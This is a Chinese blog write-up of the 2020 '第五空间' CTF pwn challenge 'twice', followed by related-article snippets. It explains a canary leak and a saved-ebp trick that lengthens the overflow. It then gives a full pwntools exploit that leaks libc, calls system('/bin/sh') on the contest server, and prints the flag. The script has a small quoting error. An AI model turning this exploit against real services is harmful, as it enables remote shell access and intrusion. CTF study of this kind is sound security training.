2020“第五空间”wp-pwn-twice

最新推荐文章于 2023-07-07 11:33:27 发布
最新推荐文章于 2023-07-07 11:33:27 发布
阅读量768 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45209963/article/details/106961902
版权

这次第五空间总算不是第500空间了…
题难度还行。pwn只做了一个twice,不过好歹是正式比赛第一次做出来pwn…放wp吧。
老规矩,先checksec一波
在这里插入图片描述
64位,开了canary和nx。上IDA。
main函数主要就是一个循环
在这里插入图片描述
sub_4007A9是这样的
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200625203301527.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80NTIwOTk2Mw==,size_16,color_FFFFFF,t_70
a1就是传入的nCount(初值为0) 。结合主函数的循环,可以知道整个循环只能跑两次。
第二次执行完后返回0,就跳出循环了。
整个的函数作用大体上就是向s数组中读v3个字节。
sub_40076D长这样
在这里插入图片描述
第一次返回89,第二次返回112。看一下栈
在这里插入图片描述
算一下,s跟canary的距离是88,89个字符正好可以覆盖掉canary的‘\x00’,使得下面puts打印出来
canary和saved ebp(一般来说这个没用,不过这道题这个很关键)。
第一次泄露了canary,第二次就可以bypass canary实现栈溢出了。
问题是输入只有112个字符,88+8(canary)+8(saved ebp)+8(return addr)=112
只够覆盖返回地址。就经典的攻击手段来说,长度根本不够。
这就需要新的方法了。回头看一下read函数相关的汇编。
在这里插入图片描述
可以看到,写入长度是由栈上数据决定的。这就意味着,如果我们把saved ebp覆盖成栈地址,
再把返回值改成这段汇编的开头,写入字节数就会由栈上的数据决定。
这里选择把saved ebp覆盖成第一次leak出来的saved ebp,结果发现输入长度被改成了我们输入的填充数据。(例如,padding=‘a’*88,输入长度就是0x61616161)。
当然这里有调试偷懒成分在,不过只要你有了第一次leak 出来的saved ebp,理论上可以通过操纵第二次的saved ebp使输入长度为栈上的任何值。
于是我们有了第三次(几乎)无限长度的输入了。接下来就是常规套路,leak 函数地址,把返回值调成start(清除各种状态防止出问题,貌似再跳到read直接执行写入也可以) 再重复之前的套路,三次溢出并get shell。
贴一下POC

from pwn import *                                          
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

#r  = process('/home/xyzmpv/pwn')                                     
r = remote('121.36.59.166', 9999) 

e = ELF('/home/xyzmpv/pwn')                                            
puts_addr = e.plt['puts']
libc_start_main_addr = e.got["__libc_start_main"]

r.recvuntil('>') #第一次溢出
r.sendline('a'*88)
r.recvuntil('\n')
canary=r.recv(7) #leak canary
ebp=r.recv(6)  #leak ebp
ebp=ebp.ljust(8,'\x00)

r.recvuntil('>')
r.send('a'*88+'\x00'+canary+ebp+p64(0x400823)) #第二次溢出 过canary 调ebp 制造无限长度写
r.send('a'*72+'\x00'+canary+ebp+p64(0x400923)+p64(libc_start_main_addr)+p64(puts_addr)+p64(0x400630))  #第三次溢出 leak libc_start_main_addr 

r.recvuntil('\n')
libc_addr = r.recvuntil('\x7f')
libc_addr = libc_addr.ljust(8,'\x00')
libc_addr = u64(libc_addr)
libc = LibcSearcher('__libc_start_main',libc_addr)
libcbase = libc_addr - libc.dump('__libc_start_main')
system_addr = libcbase + libc.dump('system')
binsh_addr = libcbase + libc.dump('str_bin_sh')

r.recvuntil('>') 
r.sendline('a'*88)
r.recvuntil('\n')
canary=r.recv(7)
ebp=r.recv(6)
ebp=ebp.ljust(8,'\x00')

r.recvuntil('>')
r.send('a'*88+'\x00'+canary+ebp+p64(0x400823))
r.send('a'*72+'\x00'+canary+ebp+p64(0x400923)+p64(binsh_addr)+p64(system_addr)) # get shell
r.interactive()

然后得到flag:flag{cvbEH0Q35q2lHE1KBQobYjqyp4}

xyzmpv
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020第五空间智能安全大赛PWN——twice
baidu_36110484的博客
06-30 825
0x00背景 这次比赛中的一道pwn题,主要考察了栈迁移和泄露canary。之前没有接触过栈迁移,所以当时没有做出来(好多人都做出来了,捂脸)。 没办法,菜鸡只能赛后复盘。注:虚拟机环境使用的动态库为kali的libc-2.30.so 0x01源码分析 主要代码逻辑如下,main函数之后可以进行两次输入,然后将输入的字符串打印出来。第一次输入可以溢出一个字节,用于泄露canary和栈地址(用于之后的栈迁移),第二次输入可以溢出到返回地址,修改程序流程完成栈迁移,从而执行ROP链。 0x02 exp构造 需
2020第五空间部分wp
starssgo的博客
06-25 2877
我是废物~,我个人的话出了4个题。分别是pwn类的twice,of,misc类的loop,re类的rev,写下wp,后续的话可能会更新pwn类的pwnme的wp,由于我环境搭建没打好,pwnme本来也是个简单题来着。 等环境整好了复现出来了在更新pwnme吧,现在先把现有的wp贴上去。 twice 程序循环两次,第一次泄露canary+stack地址,第二次执行栈迁移溢出,我这里用的ret2libc,很多方法。 from pwn import * from LibcSearcher import LibcS
2020第五空间 web writeup
a3320315的博客
06-27 3405
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
第五空间2020twice WriteUp
古月浪子的博客
07-06 284
checksec一下,开了栈溢出保护和栈执行保护 IDA打开看看,main函数是一个for循环,InitData函数执行初始化setvbuf操作后返回0 跟进这个函数,结合main函数发现,这个函数只会被调用2次,然后main函数将会结束,第一次进这个函数的时候,v3=89,第二次进这个函数的时候,v3=112 缓冲区s的大小是88字节,而后面紧跟着canary,因此第一次写满89字节以后可以泄露出canary (canary首位必定为0,所以通过第89个字节覆盖首位可以使得puts函数顺带一并输出
2020第五空间.zip
07-20
2020第五空间 比赛逆向 pwn等赛题,除web题外所有赛题均有,含wp,麒麟系统wp
第五空间-PWN5
shidaofu的博客
09-15 180
国际惯例 无脑 IDA 思路 WP 总结
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
第五空间ctf2020pwn-twice
qq_36495104的博客
06-25 646
checsec ida main函数 int __cdecl main(int argc, const char **argv, const char **envp) { for ( nCount = InitData(); (unsigned int)sub_4007A9(nCount); ++nCount ) ; return 0; } sub_4007A9函数 // a1=ncount __int64 __fastcall sub_4007A9(int a1) { unsign
2020 "第五空间"智能安全大赛 Re nop
Hk_Mayfly的博客
06-27 702
测试文件:https://wwa.lanzous.com/is4hte2ulfc 代码处理 这道题是花指令相关题目,利用int 80h做中断。 首先将包含int 80h中断的sub_804857B,sub_80485C4函数和反调试函数sub_804865B全部nop掉。 接着,将 push 地址 ... pop ebx jmp ebx 这种形式的代码,都修改为 jmp 地...
BUUCTF--第五空间决赛pwn5
sandyyyz的博客
10-13 432
给和我一样的pwn新手参考的一次简单的格式化字符串漏洞题解析过程
pwn BUUCTF第五空间决赛pwn5
doudoudedi
09-29 970
emem今天也是水题的一天阿哈哈看了一个第五空间决赛pwn5发现很简单诶 这题估计有很多的思路因为 明显的格式化字符串漏洞可以改写got表的地址,可以打印地址的内容所以 我就讲2个 它是随机数和你输入的数相同就会给你一个后门所以就可以泄露出给你的随机数然后输入进去就行了 我这里写一个 这个函数我们把其改为system函数地址然后输入’/bin/sh\x00’ 就行了很简单啊啊 from pw...
BUUCTF--pwn--[第五空间2019 决赛]PWN5【格式化字符串】
qq_73149934的博客
12-10 834
BUUCTF--pwn--[第五空间2019 决赛]PWN5
BUUCTF|PWN-[第五空间2019 决赛]PWN5-WP
l2645470582_的博客
01-10 962
1.检查保护机制 (1)开启了金丝雀和堆栈保护 (2)该文件是32位的文件 2.用32位的IDA打开该文件 (1)F12查看关键字符串 (2)我们进入反编译代码看看,看到nptr=unk_804C044才能获取权限 (3)unk_804C044有4个字节 (4)printf(&buf);存在格式化字符串漏洞 (5)kali运行该文件,用%p看出偏移量为10,利用%10$n定位到这个位置 payload构造 payload = p32(0x804C044...
[第五空间2019 决赛]PWN5
qq_53928256的博客
10-07 264
由于输入四个地址,对应输出16个字节,也就是将每个地址(即0x804C044~0x804C047)的内容修改为。由于我们将这四个地址(即0x804C044~0x804C047)存储的内容均修改为0x10,所以变量。偏移量为10,所以我们只需要对第10个到第13个参数对应的内容的地址进行修改即可;所以我们可以通过格式化字符串漏洞的任意地址修改更改地址。被存储到了第10个栈参数的位置,所以对应的偏移为10。然后将这4个地址对应的存储位置,通过。将对应地址内容修改为输出的字符个数;读出的4个字节的内容即为。
[第五空间2019 决赛]PWN5-BUUCTF-格式化字符串
yuqie的博客
07-07 287
第一眼就看到了'system',看一下条件,这里的atoi函数指的是把字符串转换成整数,而'nptr'就是输入的'passwd',再看看另外一个'dword_804C044'表示这个'0x804C044'地址,那意思就是如果输入的'passwd'的值与'dword_804C044'相等就行了,那就改写一下'0x804C044'的值。'指向的内存位置中。这个表示从上面的文件中读取4个字节的字符,并将读取的数据存储到。有canary,栈溢出无望。数了一下,偏移量为10。
CTFHub之web基础刷题记录
bmth666的博客
03-12 3228
CTFHub之从入门到入土。第一部 信息泄露全方位解析+密码泄露wp
mqtt-pwn安装
最新发布
09-20
安装mqtt-pwn的步骤如下: 1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值